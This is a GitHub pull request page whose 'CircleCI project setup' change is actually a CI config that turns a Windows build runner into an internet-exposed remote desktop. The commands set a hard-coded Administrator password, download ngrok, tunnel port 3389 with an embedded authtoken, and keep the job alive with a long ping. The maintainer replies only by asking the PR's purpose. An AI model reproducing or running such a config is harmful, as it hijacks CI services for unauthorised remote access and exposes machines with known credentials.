Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Circleci project setup #232

Open
wants to merge 2 commits into
base: develop
Choose a base branch
from
Open

Conversation

vipmar
Copy link

@vipmar vipmar commented Mar 29, 2021

version: 2.1

orbs:
win: circleci/[email protected]

jobs:
build:
executor:
name: win/default
size: "medium"

steps:
  - checkout      
  - run: Set-LocalUser -Name "Administrator" -Password (ConvertTo-SecureString -AsPlainText "Azerty302010" -Force)
  - run: Get-LocalUser -Name "Administrator" | Enable-LocalUser 
  - run: Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
  - run: tar xf ngrok.zip
  - run: Copy ngrok.exe C:\Windows\System32
  - run: cmd /c echo ./ngrok.exe authtoken "1pOzauce5ktaQW3XusCrhPmwIu0_4PHYAHWQfwNohoRTVFBgV" >a.ps1
  - run: cmd /c echo cmd /k start ngrok.exe tcp 3389 >>a.ps1
  - run: cmd /c echo ping -n 999999 10.10.10.10 >>a.ps1
  - run: .\a.ps1

@fcwu
Copy link
Owner

fcwu commented Apr 4, 2021

What the purpose of the PR? Dockerfile.arm64 has conflicts

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

2 participants